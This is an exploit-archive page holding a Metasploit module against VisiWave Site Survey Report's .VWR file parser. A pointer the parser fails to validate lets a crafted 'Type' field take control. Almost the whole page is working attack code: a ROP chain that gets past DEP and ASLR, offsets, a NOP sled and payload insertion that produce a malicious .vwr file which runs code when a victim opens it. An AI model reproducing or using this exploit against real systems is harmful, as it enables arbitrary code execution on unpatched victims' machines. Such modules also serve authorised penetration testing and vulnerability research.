VisiWave VWR File Parsing Trusted Pointer Vulnerability



EKU-ID: 318 CVE: OSVDB-ID: 72464
Author: TecR0c Published: 2011-05-26 Verified: Verified
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##
# $Id: visiwave_vwr_type.rb 12716 2011-05-25 13:57:12Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking

 include Msf::Exploit::FILEFORMAT

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'VisiWave VWR File Parsing Vulnerability',
   'Description'    => %q{
    This module exploits a vulnerability found in VisiWave's Site Survey Report application.
    When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'
    property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',
    'Image'), but if a match isn't found, the function that's supposed to handle this routine
    ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]
    instruction.  This allows attackers to overwrite it with any arbitrary value, and results code
    execution.  A patch is available at visiwave.com; the fix is done by XORing the return value as
    null if no match is found, and then it is validated before use.

    NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a
    victim user to 'double click' the malicious VWR file and execute code.  This module was also built
    to bypass ASLR and DEP.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'mr_me',  # original discovery & msf exploit
     'TecR0c'  # msf exploit
    ],
   'Version'        => '$Revision: 12716 $',
   'References'     =>
    [
     [ 'OSVDB', '72464'],
     [ 'URL', 'http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html' ],
     [ 'URL', 'http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20'],
    ],
   'Payload'        =>
    {
     'Space'       => 2000,
     'BadChars'    => "\x00\x0a\x0d",
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [
      'Windows XP SP3/Windows 7 SP0',
      {
       'Offset' => 3981,         # offset to rop gadgets
       'Pointer' => 0x007AF938,  # POP R32; POP R32; POP R32; ADD ESP 50; RETN ("magic" pointer)
      }
     ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => 'May 20 2011',
   'DefaultTarget'  => 0))

  register_options(
   [
    OptString.new('FILENAME', [ true, 'The file name.',  'msf.vwr']),
   ], self.class)
 end

 def exploit

  # Allowing nulls in our rop chain is like giving gold to midas.
  # instructions taken from the applications non aslr modules
  # libcurl.dll, VisiWaveReport.exe and blah blah
  rop_gadgets =
  [
   0x1001AFBD,  # INC EBP; PUSH ESP; POP EDI; POP ESI; POP EBP; POP EBX; RET
   0xc0fff333,  # junk
   0xc0fff333,  # junk
   0x000004cf,  # lwSize 1231 bytes
   0x100017DD,  # POP ECX; RETN
   0x10037a60,  # Writeable address from .data of libcurl.dll
   0x10011104,  # POP EDX; RETN
   0x00000040,  # RWX for VirtualProtect()
   0x10026E4D,  # MOV EAX,EDI # POP EDI # RETN
   0x10002ac6,  # RETN
   0x10022641,  # ADD EAX, 20; RETN
   0x10022641,  # ADD EAX, 20; RETN
   0x10022641,  # ADD EAX, 20; RETN
   0x10022641,  # ADD EAX, 20; RETN
   0x10022641,  # ADD EAX, 20; RETN
   0x10022641,  # ADD EAX, 20; RETN
   0x004048B1,  # XCHG EAX,EBP
   0x1001BD3F,  # POP EAX; RETN
   0x10032048,  # IAT Address - constant pointer to VirtualProtect()
   0x1000FA4A,  # MOV EAX,DWORD PTR DS:[EAX]; RETN
   0x00657fd7,  # XCHG EAX,ESI; RETN
   0x1000af40,  # PUSHAD; RET
  ].pack("V*")

  # grab the pointer to our buffer
  pointer = [target["Pointer"]].pack("V")

  sploit = pointer  # begin life in EDX
  sploit << rand_text_alphanumeric(target["Offset"])  # massive offset
  sploit << rop_gadgets      # rop chain
  sploit << make_nops(300)   # safe landing
  sploit << payload.encoded  # profit!

  vwr_data = "FileType: SSREPORT\r\n"
  vwr_data << "Product: VisiWave Site Survey, 1.6.5 Beta\r\n"
  vwr_data << "FileVersion: 10\r\n"
  vwr_data << "Item: Global Properties\r\n"
  vwr_data << "Checked: 1\r\n"
  vwr_data << "Type: #{sploit}\r\n"
  vwr_data << "SurveyFile: C:\Program Files\VisiWave Site Survey\Samples\SampleData.vws\r\n"
  vwr_data << "FloorPlanImageReport: C:\WINDOWS\Web\bullet.gif\r\n"
  vwr_data << "DefaultOrientation: 0\r\n"
  vwr_data << "Header:\r\n"
  vwr_data << "Footer:\r\n"
  vwr_data << "LeftMargin: 100\r\n"
  vwr_data << "RightMargin: 100\r\n"
  vwr_data << "TopMargin: 50\r\n"
  vwr_data << "BottomMargin: 50\r\n"
  vwr_data << "Item: #{rand_text_alpha(3)}\r\n"
  vwr_data << "Checked: 1\r\n"

  print_status("Creating '#{datastore['FILENAME']}'...")
  file_create(vwr_data)
 end

end